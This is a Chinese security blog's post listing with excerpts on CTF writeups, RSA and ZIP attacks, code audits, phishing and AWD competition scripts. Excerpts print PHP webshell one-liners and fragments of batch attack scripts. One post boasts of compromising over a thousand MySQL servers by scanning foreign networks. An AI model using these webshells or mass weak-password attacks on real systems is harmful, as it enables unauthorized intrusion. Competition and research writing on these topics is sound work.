- 博客(35)
- 收藏
- 关注
原创 Java代码审计初探-JtopCMS文件上传漏洞(CNVD-2021-05471)
原文发在freebuf:https://www.freebuf.com/vuls/267872.html漏洞信息 CNVD-ID CNVD-2021-05471 公开日期 2021-02-26 危害级别 高 ([AV:N/AC:L/Au:N/C:C/I:C/A:C]) 影响产品 合肥明靖信息科技有限公司 JTopCMS 4.0.0 ..
2021-04-06 10:03:31 2247
原创 开源资产/漏洞管理平台使用测评
对几款开源资产/漏洞管理平台的简单测评。TideSec/Mars Mars(战神)——资产发现、子域名枚举、C段扫描、资产变更监测、端口变更监测、域名解析变更监测、Awvs扫描、POC检测、web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等!地址 https://github.com/TideSec/Mars使用命令# docker run --name tide-mars -p 5000:5000
2021-03-01 15:43:13 9215 6
原创 volatility2各类外部插件使用简介
插件使用方式:1.把插件文件放入volatility的plugins中2.使用--plugins参数指定插件目录官方-社区插件项目https://github.com/volatilityfoundation/community注意:1.如果使用出错,可以打开插件文件或者单独运行,可能是有些库没有安装2.官方虽然提供了一个社区插件的整合仓库,却没有给出详细说明。文件夹名称是插件制作者的姓名,文件夹内才是插件真正的名称。下面挑一部分进行说明。mimaka...
2020-12-10 16:50:35 5530
原创 先知社区-文章爬虫-python脚本
说明· 先知社区文章爬虫,保存成pdf文件· 自己是在win10上跑的,没太考虑其他系统。windows应该可以直接跑,其他系统需提前安装wkhtmltopdf,然后在代码里修改路径。path_wk = r'.\wkhtmltopdf\bin\wkhtmltopdf.exe'· 采用的是逆序,从最新文章开始保存。需手动在代码里,8590位置处,填写最新一篇文章的页码。 for i in range(8590,0,-1): #逆序循环爬取,注意这里要添加最新文章的页码 https:
2020-12-07 10:54:26 3422 10
原创 ZIP已知明文攻击深入利用
首发在:https://www.freebuf.com/articles/network/255145.html一、前言你加密的压缩包比你想象中的还不安全!哪怕对于信息安全人员来说,很多时候给压缩包加上一个密码就以为的是万事大吉了。但事实是,很多情况下,你的加密压缩包,远远没有你想象的安全。二、内容概要以往进行ZIP已知明文攻击,通常需要一个完整的明文文件。 而本文讨论的攻击方式只需要知道加密压缩包内容的12个字节,即可进行攻击破解降低了已知明文的攻击难度。同时,结合各类已知的...
2020-11-18 11:06:15 9020 1
原创 2020湖湘杯MISC全解-writeup
MISC1导出index-demo.html,查看代码发现隐藏了一长串base64使用base64隐写进行解密key:"lorrie"得到key说明可能存在某种隐写,是snow隐写,但用网页版的snow隐写解出来是一串乱码,于是尝试使用本地版的SNOW.EXESNOW.EXE -p lorrie index-demo.htmlflag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→...
2020-11-02 18:40:03 4672 15
原创 2020西湖论剑线上赛-密码学-BrokenSystems
题目附件: 链接:https://pan.baidu.com/s/18R-ZAeKXScPThuH_6BXwvw 提取码:ybu9从公钥中提取出n、e后,发现e非常大,可以用wiener-attack求出私钥d来解密。然后用PKCS1_OAEP的方式进行解密#coding=utf8#python3#Author=BlusKingfrom Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_OA...
2020-10-09 17:28:04 590 1
原创 Werkzeug更新带来的Flask debug pin码生成方式改变
前言: 首发在Freebuf:https://www.freebuf.com/articles/network/238485.html于2020.4月成稿,时隔3个月被发布,内容为flask debug pin码构造方式的改变。正文: 复现2020GYCTF-FLASKAPP及 2019CISCN double_secret出现异常。题目本身有两个解题方式。其中一个思路是:当Flask开启debug模式时,可以在报错页面输入pin码来执行python命令。...
2020-07-06 10:31:24 1345
原创 通达OA 漏洞分析
漏洞通报信息:https://mp.weixin.qq.com/s/_bpg8buT92dzRuGdr2ZrRghttps://mp.weixin.qq.com/s/s1yqJNOsCk-uVyCtg6SG7AOA-2017非官网:http://www.downxia.com/downinfo/202980.html最新版v11下载地址:http://www.tongda20...
2020-03-19 15:49:36 9675 1
原创 安恒杯月赛之以赛战“疫”-- writeup解题思路
CRYPTO-古典密码1iodj{36g9i2777符号不变进行凯撒移位flag{36d9f2777-... ----. ..--- -... .- -.-. ...-- ----. .- .- ..---摩斯解码b92bac39aa2a0dd}b6942c07栅栏密码https://www.qqxiuzi.cn/bianma/zhalanmi...
2020-02-27 10:22:52 2795
原创 从无到有分析thinkphp6 session文件操作漏洞
漏洞介绍: 2020年1月10日,ThinkPHP团队发布一个补丁更新,修复了一处由不安全的SessionId导致的任意文件操作漏洞。该漏洞允许攻击者在目标环境启用session的条件下创建任意文件以及删除任意文件,在特定情况下还可以getshell。该漏洞已经有分析文章:https://mp.weixin.qq.com/s/UPu6cE20l24T6fkYOlSUJw 但分析...
2020-02-16 16:57:43 1666
原创 抖音·某无关痛痒的信息泄露接口
以前的老稿子,发现是私密状态。 重新发布一下,做个记录。---------------------当初的正文-------------------------------------------------------------------------------------------------------------------版本:3.7.0(测试时最新)起...
2020-02-09 23:08:05 1563 1
原创 RSA加解密公式的同余变式说明
RSA算法中,加密明文用到公式: c= m^e mod n解疑: c是cipher,密文;m是message,明文; e是加密指数; n是公钥。该变式在rsa算法中等价于: c≡ m^e mod n解疑:“≡”是同余符号,mod是求余数,在python中表示为%。 两个整数a,b,若它们除以整数m所得的余数相等, 则称a,...
2020-02-07 14:18:20 1676
原创 RSA攻击方式一览--自查表
粗略整理RSA的攻击方式, 欢迎指正和补充。·p,q 过大或过小:n可能被分解·p,q过近:导致n开方可得近似值·e过小:低加密指数攻击 ·明文过小:小明文攻击·e很大:Wiener-attack·e=2:Rabin算法·低加密指数广播攻击:e较小,并且使用不同的n,多次加密相同的明文。·共模攻击:对于同一明文m,使用同样的n,不同的e分别进行加密·共...
2020-01-31 22:51:31 3189
原创 根治dockerfile构建镜像时mysql服务报错问题--(Ubuntu内核快速升级)
1.Linux version 4.4.0-137-generic (buildd@lgw01-amd64-037) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.10) ) #163-Ubuntu SMP Mon Sep 24 13:14:43 UTC 2018在上述ubuntu上使用Dockerfile构建镜像时,拉...
2020-01-21 10:55:52 422
原创 红队攻击:轻松玩转邮件钓鱼
首发在合天智汇:https://mp.weixin.qq.com/s/sRXnwIdy3eQ0CJS58_bI1g 邮件钓鱼老生常谈,攻击手段也并不新颖。但对于网络安全工程师来说,“懂原理”和“会使用”是两个概念。会用,用得好不好,又是不同的层次。红队攻击要讲究攻击的效率,人力投入的性价比,以及能获得的数据结果的重要性。钓鱼攻击原理不难,但找到可用性高的框架或平台难。网上的钓鱼平台...
2020-01-15 14:41:56 3238 1
原创 AWD攻击脚本-多线程-批量-打全场-保存flag
多线程批量attack全场,并输出、保存flag一、针对文件包含漏洞的脚本#!/usr/bin/env python# encoding: utf-8import requestsimport urllibimport timeimport threadingimport base64#批量Get_Flagdef init1(): global ...
2019-09-21 22:52:14 5482 1
原创 2019强网杯 - 密码学-RSA-Coppersmith
Coppersmith 相关攻击学习资料:https://ctf-wiki.github.io/ctf-wiki/crypto/asymmetric/rsa/rsa_coppersmith_attack/https://code.felinae98.cn/ctf/crypto/rsa%E5%A4%A7%E7%A4%BC%E5%8C%85%EF%BC%88%E4%BA%8C%EF%BC%...
2019-05-28 19:09:55 18421 7
原创 自制Python后台目录扫描器
以前用御剑扫描,但经常会出现bug,不抓流量还不一定能发现,结果可信度不高。当然也可以偷懒使用burpsuite之类的intruder功能来充当扫描器。但为了更好的掌控扫描的情况,就自己写了个python扫描器。代码如下:#!/usr/bin/env python# encoding: utf-8import requestsimport threadingimpo...
2019-05-28 17:35:16 1015
原创 一条命令完成snort安装
跟安装docker一样不需要像网上那么麻烦,直接apt就行。Ubuntu16.04安装snort:sudo apt install snort
2019-05-20 14:14:20 353
原创 AWD模式下的各类PHP木马
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?><?php@assert($_POST['cmd']);?>混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php ...
2019-04-19 17:09:29 5387 1
原创 自制python脚本,6小时获取上千台mysql数据库服务器
原文投稿在合天智汇的微信公众号:https://mp.weixin.qq.com/s/OuwL3O9rszdbRPg_6uLPGQ但由于那里文章中的截图过于模糊,于是在这里再记录一下。 前言: 一开始,我只是想把一个AWD下的批量写马工具升级改造一下,记录一下期间的心得体会,本以为现在mysql弱口令连接的漏洞很少。但当最后工具完成后,一测试扫描外国网段,半天时间...
2018-12-24 15:31:17 1077 7
原创 安恒月赛WriteUp-2018.12
安恒月赛WriteUp2018-12月 WEB1-easy:web1反序列化 一打开就显示了源代码: <?php @error_reporting(1);include 'flag.php';class baby{ public $file; function __toString() { ...
2018-12-22 22:24:51 2927
原创 ubuntu解决"无法获得锁"与"无法打开锁文件"
sudo apt-get install XXXXXX 报错1:E: 无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/dpkg/),是否有其他进程正占用它? 解决:查看占用apt-get的进程的pid,然后killps -A | grep aptkill可以一个命令完成:...
2018-12-14 16:01:34 4160 1
原创 对shopex电商网站的渗透
快毕业了,最近在整理大学四年的相关知识,发现原来两年前的自己比现在有劲头。两年前对shopex网站进行了测试,有好几处漏洞。整理时发现了当时的记录文档,可能过程不够详细,只讲了大概的思路。 相关知识点: 验证码爆破 XSS拿cookie 社会工程学 Sql二阶注入 一.好了,开始。二话不说先注册一个账号. 登录后提示可...
2018-12-11 11:32:38 1265
原创 利用burpsuite挖掘教育系统通用密码重置漏洞的详细过程
利用burpsuite挖掘教育系统通用密码重置漏洞的详细过程 北京万学教育科技有限公司旗下的教育系统可绕过手机验证,涉及多个教育平台。导致黑客可以重置任意用户密码来登录任意账户。账户后台存在部分个人信息,同时能进行着交易支付,造成了进一步的危害。(该漏洞一年前已修复). 漏洞成因:没有对手机验证码的验证次数做限制,而且验证码长度只有四位,使黑客可以通过爆破手段绕过一切需要手机验...
2018-12-11 09:39:15 3093 4
原创 CTF中压缩包解密的几种常见方式
压缩包解密通用方法:1.用winhex打开,搜索字符pass 、 key 等,查看是否有含有压缩包密码2.如果要爆破: 先0-6位数字来一遍3.如果爆破不成功可以根据题意或者社工 猜密码组合。例如某用户名叫王方,密码就有可能是wangfang123. crc32爆破:压缩包压缩文件会附带crc32校验码,如果字节长度比较短的话,可以尝试crc32爆破。比方说...
2018-12-10 19:22:58 46518 2
原创 数据流量包-Python辅助分析脚本
流量包往往大而繁杂,所以编写了该Python脚本辅助。需用Linux环境,因为调用了Tcpdump。将该脚本放入pcap数据包的目录中运行,可以输入1-4。1可以批量改名,3批量过滤,4将包合成 2可以在过滤后自动将过滤出的包合成。在过滤选项中也有几个选择,1只过滤http流量,2只过滤ftp流量,3.同时过滤http和ftp流量,4自定义过滤,填tcpdump的语句。...
2018-12-10 18:43:17 1781 2
原创 简便方式-获取Python线程的真假返回值
编写某脚本时需要获取线程中报错信息来做出判断,而线程是不带返回值的。因为线程有独立的栈,线程产生的异常发生在不同的栈上,因此利用try..except无法捕捉到线程的报错,也无法获取线程调用的函数的返回值。网上有利用类的变量来传递线程内的消息,也有使用 Queue 库创建队列实例来传递数据的。但总觉得有些“臃肿”,不太满意。思考着突然豁然开朗,可以在线程运行的函数内部判断端口的连接情况,然后用...
2018-12-10 14:50:51 239
原创 AWD-ssh批量执行命令脚本
前两年有些AWD比赛,环境没有做隔离,服务器初始化密码都一样,可通过批量连接每台服务器来修改密码,执行命令。或者是已经拿到多台服务器权限后,做一个批量管理。平时企业运维中,可能也用得到。 #-*- coding: utf-8 -*-#!/usr/bin/python import paramikoimport threadingdef ssh2(ip,u...
2018-12-10 08:04:45 3067
原创 AWD下-MySql漏洞批量利用脚本
这个脚本最开始的构思是在AWD比赛的情景下,因为所有服务器的环境都相同,只要查看本地的MySql用户名密码就知道了所有服务器的MySql用户名密码。若服务器开放了3306端口,那么利用这一个漏洞就能顺利获得所有服务器权限。有备无患,于是就写了这个Mysql批量连接写小马的脚本。以下是最初的脚本(python2),当然后来又更新换代加了骚思路,过一段时间会放出...... 需要安装mysq...
2018-12-09 21:20:02 1662
原创 python socket.connect注意事项,端口应为int型
import socketdef port_status(ip,port): server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: server.connect((ip,port)) print('port open') server.close(...
2018-11-21 17:31:45 9757
原创 华为交换机基本命令
命令不区分大小写,支持“Tab”键补全,支持命令简写。一、常用命令用户视图<Huawei> 进入系统视图<Huawei> system-view 或者 sys 或者 system[Huawei] 更改设备的名字[Huawei] sysname HW [HW] 进入接口视图[Huawei]interfa...
2018-11-10 21:10:55 38752 4
原创 KALI64位安装32位兼容库
参考:https://blog.csdn.net/qq_21210995/article/details/60333737为了使在64位kali中使用gdb调试32位程序,并且让gcc和g++能够使用-m32来编译32位的程序,要进行一下操作。个人使用kaili的原始更新源(使用其它的源似乎有问题)使用命令:leafpad /etc/apt/sources.list,并改为以下内容,#官方源deb...
2018-04-14 20:12:38 5411
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人